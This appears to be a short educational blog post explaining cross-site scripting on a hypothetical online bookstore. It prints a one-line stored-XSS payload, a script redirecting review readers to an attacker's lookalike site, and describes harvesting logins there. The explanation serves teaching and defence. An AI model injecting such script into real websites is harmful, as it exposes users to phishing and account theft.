This attack is closely related to SQL injection. It involves entering data other than what was intended,
and it depends on the web programmer not filtering input. The perpetrator finds some area of a website that allows users to type in text that other users will see and then instead injects client-side script into those fields.
.https://blog.perimeterx.com/joomla-cve-2015-7297/
Note
Before I describe this particular crime, I would point out that the major online retailers such as
eBay and Amazon.com are not susceptible to this attack; they do filter user input.
To better understand this process, let’s look at a hypothetical scenario. Let’s assume that ABC online
book sales has a website. In addition to shopping, users can have accounts with credit cards stored, post reviews, and more. The attacker first sets up an alternate web page that looks as close to the real one as possible. Then the attacker goes to the real ABC online book sales website and finds a rather popular book. He goes to the review section, but instead of typing in a review he types in this:
<script> window.location = "http://www.fakesite.com"; </script>
Now when users go to that book, this script will redirect them to the fake site, which looks a great deal like the real one. The attacker then can have the website tell the user that his session has timed out and to please log in again. That would allow the attacker to gather a lot of accounts and passwords. That is only one scenario, but it illustrates the attack.
0 Comments